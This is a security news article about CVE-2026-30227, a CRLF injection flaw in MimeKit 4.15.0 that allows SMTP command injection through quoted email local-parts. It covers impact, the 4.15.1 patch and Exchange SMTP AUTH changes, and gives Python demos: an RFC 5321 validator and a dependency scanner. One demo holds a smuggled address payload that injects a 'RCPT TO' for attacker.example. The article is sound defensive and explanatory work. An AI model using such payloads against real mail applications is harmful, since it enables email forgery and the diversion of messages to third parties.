SAN FRANCISCO — A security vulnerability in MimeKit 4.15.0, a widely used C# library for creating and parsing email messages, allows an attacker to inject arbitrary SMTP commands through a malformed email address, potentially enabling email forgery and unauthorized message delivery. The flaw, registered as CVE-2026-30227, was published on March 6, 2026, and a patch was issued the same day in version 4.15.1.

The Vulnerability

The flaw is a CRLF injection vulnerability in MimeKit 4.15.0 that allows an attacker to embed `\r\n` into the SMTP envelope address local-part, specifically when the local-part is a quoted-string (the `"..."@domain` form, which permits characters such as spaces that a bare local-part does not). In plain terms, an attacker can smuggle line breaks into what looks like a valid email address; because an SMTP server treats every CRLF as the end of a command line, it reads whatever follows the injected line break as new, separate protocol commands.

Accepting such a value is non-compliant with RFC 5321 and can result in SMTP command injection (for example, injecting additional RCPT TO, DATA, or RSET commands) and/or mail header injection, depending on how the application uses MailKit/MimeKit to construct and send messages.

The issue becomes exploitable when the attacker can influence a `MailboxAddress` (MAIL FROM / RCPT TO) value that is later serialized to an SMTP session. This is a realistic scenario in any web application that accepts user-supplied email addresses — such as contact forms, registration flows, or email forwarding services — and passes them to MimeKit without sanitizing control characters.

RFC 5321 explicitly defines the SMTP mailbox local-part grammar and does not permit CR (character 13) or LF (character 10) inside a quoted string: section 4.1.2 builds a Quoted-string from qtextSMTP and quoted-pairSMTP, both of which are restricted to printable ASCII. SMTP commands are terminated by CRLF (`\r\n`), which is what makes CRLF injection into command arguments particularly dangerous: the server cannot tell an injected line ending from a genuine one.
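To make the mechanism concrete, here is an added example written for this article (it is not MimeKit or MailKit code): it serialises an SMTP envelope the way a client that trusts its addresses would, shows how a line-oriented server splits the result into commands, and implements the RFC 5321 local-part check an application should apply before a string reaches `MailboxAddress` or any SMTP client. The addresses, host names and the injected payload are constructed for the demonstration, and the Python code is a protocol-level illustration rather than the library's own implementation.

```python
# Added example: protocol-level view of the CRLF injection described above.
# Written for this article; not MimeKit/MailKit source. All addresses, hosts
# and the injected payload are constructed for the demonstration.
import re

CRLF = "\r\n"

# RFC 5321 section 4.1.2, mailbox local-part grammar:
#   Local-part      = Dot-string / Quoted-string
#   Dot-string      = Atom *("." Atom);  Atom = 1*atext
#   Quoted-string   = DQUOTE *QcontentSMTP DQUOTE
#   QcontentSMTP    = qtextSMTP / quoted-pairSMTP
#   qtextSMTP       = %d32-33 / %d35-91 / %d93-126  (printable ASCII minus '"' and '\')
#   quoted-pairSMTP = %d92 %d32-126                 (backslash + one printable ASCII)
# No production admits CR (13), LF (10) or any other control octet.
ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]"
DOT_STRING = re.compile(ATEXT + r"+(?:\." + ATEXT + "+)*")
QUOTED_STRING = re.compile(r'"(?:[\x20\x21\x23-\x5b\x5d-\x7e]|\\[\x20-\x7e])*"')
# Domain = sub-domain *("." sub-domain). Address literals such as [192.0.2.1]
# are deliberately not accepted here.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
DOMAIN = re.compile(LABEL + r"(?:\." + LABEL + ")*")
# fullmatch() is used below on purpose: with match() and a '$' anchor, a
# trailing "\n" would still be accepted, which is exactly the bug class at hand.


def validate_smtp_mailbox(address: str) -> str:
    """Return `address` unchanged if it is an RFC 5321 Mailbox, else raise ValueError.
    This is the application-side check to apply before a string reaches a
    MailboxAddress or an SMTP client; CR or LF in any position is rejected."""
    if len(address) > 254:                          # path limit, RFC 5321 4.5.3.1.3
        raise ValueError("address exceeds 254 octets")
    at = address.rfind("@")                         # a quoted local-part may contain '@'
    if at <= 0 or at == len(address) - 1:
        raise ValueError("address is not local-part@domain")
    local, domain = address[:at], address[at + 1:]
    if len(local) > 64:                             # local-part limit, RFC 5321 4.5.3.1.1
        raise ValueError("local-part exceeds 64 octets")
    if not (DOT_STRING.fullmatch(local) or QUOTED_STRING.fullmatch(local)):
        raise ValueError("local-part is neither Dot-string nor Quoted-string: %r" % local)
    if not DOMAIN.fullmatch(domain):
        raise ValueError("domain is not an RFC 5321 Domain: %r" % domain)
    return address


def is_valid_smtp_mailbox(address: str) -> bool:
    """Boolean convenience wrapper around validate_smtp_mailbox()."""
    try:
        validate_smtp_mailbox(address)
        return True
    except ValueError:
        return False


def naive_envelope(mail_from: str, rcpt_to: str) -> bytes:
    """The vulnerable pattern: write envelope commands trusting the addresses."""
    return (f"MAIL FROM:<{mail_from}>{CRLF}"
            f"RCPT TO:<{rcpt_to}>{CRLF}"
            f"DATA{CRLF}").encode("ascii")


def hardened_envelope(mail_from: str, rcpt_to: str) -> bytes:
    """Same serialisation, but only for addresses that pass the RFC 5321 check."""
    return naive_envelope(validate_smtp_mailbox(mail_from),
                          validate_smtp_mailbox(rcpt_to))


def server_view(wire: bytes) -> list[str]:
    """How a line-oriented SMTP server reads the bytes: each CRLF ends a command."""
    return [line for line in wire.decode("ascii").split(CRLF) if line]


# Constructed payload: a quoted local-part carrying two extra CRLF-terminated
# lines, so the single RCPT TO the application meant to send becomes three.
INJECTED_RCPT = ('"bob' + CRLF
                 + "RCPT TO:<attacker@attacker.example>" + CRLF
                 + 'RCPT TO:<x"@example.com')

if __name__ == "__main__":
    for command in server_view(naive_envelope("noreply@victim.example", INJECTED_RCPT)):
        print("server sees:", command)
    try:
        hardened_envelope("noreply@victim.example", INJECTED_RCPT)
    except ValueError as err:
        print("rejected:", err)
```

Run stand-alone, the script prints the five command lines the server would see (the injected `RCPT TO:<attacker@attacker.example>` among them) and then the rejection from the hardened path. How a real server reacts to the malformed fragments on either side of the injected line depends on the server; the point is that the well-formed injected line is indistinguishable from a legitimate command. The 4.15.1 release addresses the issue inside the library; keeping a check like this on the application side is the defence in depth the vendors quoted in this article recommend.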

CVSS Score and Classification

The vulnerability carries the CVSS 3.1 vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N`, which corresponds to a base score of 5.3 (Medium), and is classified under CWE-93: Improper Neutralization of CRLF Sequences. The vector reflects a network-exploitable, low-complexity attack requiring no privileges and no user interaction, with unchanged scope. The integrity impact is rated low: the vulnerability does not grant control of the host or of the mail server, but it does allow an attacker to alter the outgoing SMTP transaction, for example by adding recipients or changing message content.

CVE-2026-30227 describes MimeKit as a C# library used for the creation and parsing of messages using the Multipurpose Internet Mail Extension (MIME), as defined by numerous IETF specifications. The library is distributed as a NuGet package and is used across a broad range of .NET applications.

Scope of Exposure

MimeKit is an open source library for creating and parsing MIME, S/MIME, and PGP messages on desktop and mobile platforms. It also supports parsing of Unix mbox files. MimeKit and MailKit support Windows, Linux, Mac, iOS, Android, Windows Phone, and more.

MailKit is an open source cross-platform .NET mail-client library that is based on MimeKit and optimized for mobile devices. Because MailKit depends directly on MimeKit, applications using MailKit for SMTP communication are also potentially exposed to this vulnerability. MailKit boasts over 77.8 million downloads on NuGet, indicating a large installation base across the .NET ecosystem. The reach of CVE-2026-30227 extends to every downstream application that relies on either library to construct SMTP sessions with user-controlled address inputs.

Attack Mechanics

The technique at the root of this vulnerability, CRLF injection, is a well-documented category of attack in SMTP contexts. SMTP injection occurs when an attacker can inject arbitrary SMTP commands into the communication between a client and a server, typically by placing CRLF sequences inside a user-controlled parameter that the client copies into an SMTP command without validation or adequate sanitization.

The impact of SMTP injection can vary depending on the context of the affected application. Common impacts include sending copies of emails to a third party, modifying the content of the message being sent to the SMTP server, and leveraging the affected application as a proxy to conduct phishing attacks.

A parallel case from the Java ecosystem, the SMTP command injection advisory for the Netty SMTP codec cited below, illustrates the gravity of this class of vulnerability. Injected commands are sent from the application's own outbound mail server, so the forged messages pass SPF (the connecting host is an authorized sender for the domain) and, where that server signs outbound mail, DKIM as well. Forged messages therefore bypass the standard authentication filters and land in inboxes as apparently trustworthy mail from a trusted source, which makes them highly effective phishing lures.

The attack succeeds only where neither the library nor the application rejects CR and LF in address input. Vendors responding to SMTP injection reports have stressed the need for input validation on the application side before data is passed to a mail library, because a library's own address validation might not catch every malformed value.

The Fix

All versions of MimeKit before 4.15.1 are affected. The recommended remediation is to upgrade to version 4.15.1 or above. The patch was published on March 6, 2026, the same day the advisory was disclosed publicly. Developers using MimeKit or MailKit via NuGet are advised to update their package references immediately; because MailKit pulls MimeKit in as a transitive dependency, check the resolved MimeKit version (for example with `dotnet list package --include-transitive`), not just the MailKit version pinned in the project file.
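An added check, written for this article rather than taken from the advisory or the project: it reads a NuGet `packages.lock.json`, which records the resolved version of every direct and transitive package per target framework, and reports any MimeKit resolved below 4.15.1. The lock-file content, target framework monikers and package set embedded in the script are constructed for the example.

```python
# Added example (not part of the advisory or of MimeKit): scan a NuGet
# packages.lock.json for MimeKit resolved below 4.15.1, including the
# transitive copy that a MailKit reference pulls in. The lock-file content
# below is constructed for the demo.
import json

FIXED_VERSION = "4.15.1"   # first MimeKit release carrying the fix, per the advisory


def parse_version(version: str) -> tuple:
    """Order NuGet (SemVer-style) versions: '4.15.1-preview.1' < '4.15.1' < '4.16.0'.
    Only the first three numeric components are compared, so a legacy fourth
    component ('4.15.1.0') is ignored; prerelease tags compare as strings."""
    core, _, prerelease = version.partition("-")
    core = core.split("+", 1)[0]                          # drop build metadata
    numbers = tuple(int(part) for part in core.split(".")[:3])
    numbers += (0,) * (3 - len(numbers))
    # A release sorts after any prerelease of the same number.
    return numbers + ((1, "") if not prerelease else (0, prerelease))


def scan_lock_file(lock_json: str, fixed: str = FIXED_VERSION) -> dict:
    """Return {'vulnerable': [MimeKit entries resolved below `fixed`],
               'mailkit':    [MailKit entries, for context]}.
    Each entry is {'framework', 'package', 'type', 'resolved'}."""
    data = json.loads(lock_json)
    if data.get("version") != 1:
        raise ValueError("unsupported packages.lock.json version")
    report = {"vulnerable": [], "mailkit": []}
    for framework, packages in data.get("dependencies", {}).items():
        for name, info in packages.items():
            resolved = info.get("resolved", "")
            if not resolved:                              # e.g. "type": "Project" entries
                continue
            entry = {"framework": framework, "package": name,
                     "type": info.get("type", "?"), "resolved": resolved}
            if name.lower() == "mimekit" and parse_version(resolved) < parse_version(fixed):
                report["vulnerable"].append(entry)
            elif name.lower() == "mailkit":
                report["mailkit"].append(entry)
    return report


# Constructed lock file: net8.0 references MailKit directly and gets MimeKit
# 4.15.0 transitively; net9.0 references a fixed MimeKit directly.
SAMPLE_LOCK = json.dumps({
    "version": 1,
    "dependencies": {
        "net8.0": {
            "MailKit": {"type": "Direct", "requested": "[4.15.0, )",
                        "resolved": "4.15.0", "contentHash": "constructed"},
            "MimeKit": {"type": "Transitive", "resolved": "4.15.0",
                        "contentHash": "constructed"},
            "Newtonsoft.Json": {"type": "Transitive", "resolved": "13.0.3",
                                "contentHash": "constructed"},
        },
        "net9.0": {
            "MimeKit": {"type": "Direct", "requested": "[4.15.1, )",
                        "resolved": "4.15.1", "contentHash": "constructed"},
        },
    },
})

if __name__ == "__main__":
    result = scan_lock_file(SAMPLE_LOCK)
    for hit in result["vulnerable"]:
        print("VULNERABLE  %(framework)s  %(package)s %(resolved)s (%(type)s)" % hit)
    for ctx in result["mailkit"]:
        print("context     %(framework)s  %(package)s %(resolved)s (%(type)s)" % ctx)
```

A lock file is only present when the project sets `RestorePackagesWithLockFile`; without one, `dotnet list package --include-transitive` prints the same resolved versions, and `dotnet list package --vulnerable` asks the NuGet advisory feed directly once the advisory has propagated there. The script deliberately flags MimeKit rather than MailKit, because the fix lives in MimeKit and the MailKit version alone does not tell you which MimeKit was resolved.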

SMTP injection is a vulnerability often overlooked by developers and open source library maintainers. In most cases, these issues should be remediated by library maintainers, and many well-known libraries — such as JavaMail, PHPMailer, and RubyMail — already prevent SMTP injection by sanitizing CRLF characters.

The advisory for CVE-2026-30227 is tracked under GitHub Security Advisory identifier GHSA-g7hc-96xr-gvvx and is listed in the NVD (National Vulnerability Database), GitLab Advisory Database, and THREATINT’s CVE tracker.

Microsoft Exchange Context

The disclosure of CVE-2026-30227 arrives alongside a separate but related development in the SMTP landscape: Microsoft’s revised deprecation timeline for Basic Authentication in Exchange Online SMTP AUTH.

Originally scheduled for retirement in early 2026, Microsoft published an updated deprecation timeline on January 27, 2026, giving organizations additional time to transition to modern authentication.

Under the revised plan, SMTP AUTH Basic Authentication behavior remains unchanged until December 2026. At the end of December 2026, SMTP AUTH Basic Authentication will be disabled by default for existing tenants, though administrators will still be able to enable it if needed.

New tenants created after December 2026 will not have SMTP AUTH Basic Authentication available by default. In the second half of 2027, Microsoft will announce a final removal date, after which Basic Auth will be permanently blocked with no option to re-enable.

Basic auth is a legacy authentication method that sends the username and password with every connection, base64-encoded but otherwise in plain text, so the credentials are protected only by whatever TLS wraps the session. This makes it vulnerable to credential theft, phishing, and brute force attacks. To improve the protection of customers and their data, Microsoft is retiring Basic auth from Client Submission (SMTP AUTH) and encouraging customers to use modern authentication methods that are more secure.

SMTP AUTH for Client Submission represents the last major component of Basic Authentication still functioning in Exchange Online, making its pending retirement particularly significant for transactional email systems and automated email sending applications. SMTP AUTH allows applications and scripts to authenticate with SMTP servers and send email on behalf of users — a capability essential for automated email generation, marketing platforms, and business process automation systems.

Background

CRLF injection vulnerabilities in SMTP libraries are not new, but they recur regularly as new implementations or updates introduce insufficiently validated code paths. The SMTP protocol, as defined in RFC 5321, uses the CRLF character sequence to terminate every command line. RFC 5321 clearly states that only CRLF is the SMTP command line separator. Neither a single LF nor CR should occur in the command line. When a library fails to enforce this boundary on user-supplied input, an attacker who controls any part of an address field can terminate one command early and issue a new one — effectively hijacking the SMTP session.

Similar vulnerabilities have previously affected Ruby’s Net::SMTP library, Java’s JavaMail, the Netty SMTP codec, and PHP’s PHPMailer, among others. The recurrence of this vulnerability class across ecosystems reflects the challenge of enforcing protocol-level constraints at every layer of an email software stack.

MimeKit is a .NET Foundation project. It is a .NET MIME creation and parser library with support for S/MIME, PGP, DKIM, TNEF, and Unix mbox spools.

Current Status

The patched version, MimeKit 4.15.1, is available on NuGet. The CVE-2026-30227 advisory is listed in the GitHub Advisory Database under GHSA-g7hc-96xr-gvvx, in the GitLab Advisory Database, and in the NIST National Vulnerability Database. No public exploit code has been confirmed at the time of writing. Organizations running MimeKit 4.15.0 in production environments where user-supplied email addresses are passed to SMTP sessions are advised to apply the update without delay.

Sources

  1. GitLab Advisory Database — *CVE-2026-30227: MimeKit has CRLF Injection in Quoted Local-Part that Enables SMTP Command Injection and Email Forgery* — advisories.gitlab.com
  2. THREATINT — *CVE-2026-30227* — cve.threatint.eu
  3. Microsoft Tech Community — *Updated Exchange Online SMTP AUTH Basic Authentication Deprecation Timeline* — techcommunity.microsoft.com
  4. Microsoft Tech Community — *Exchange Online to retire Basic auth for Client Submission (SMTP AUTH)* — techcommunity.microsoft.com
  5. Snyk — *Avoiding SMTP Injection: A Whitebox Primer* — snyk.io
  6. GitHub Advisory Database — *Netty has SMTP Command Injection Vulnerability that Allows Email Forgery* — github.com/advisories
  7. NuGet Gallery — *MimeKit* — nuget.org
  8. .NET Foundation — *MailKit – Working with Emails* — dotnetfoundation.org
  9. Innovia Consulting — *Microsoft to Retire Basic Auth SMTP for Exchange Online* — innovia.com
  10. Cyberpress — *Exchange Online SMTP AUTH Deprecation Looms – Tenants Urged To Migrate Now* — cyberpress.org
  11. MBSD Technical Whitepaper — *SMTP Injection via Recipient Email Addresses* — mbsd.jp
  12. Debian Security Tracker — *CVE List* — salsa.debian.org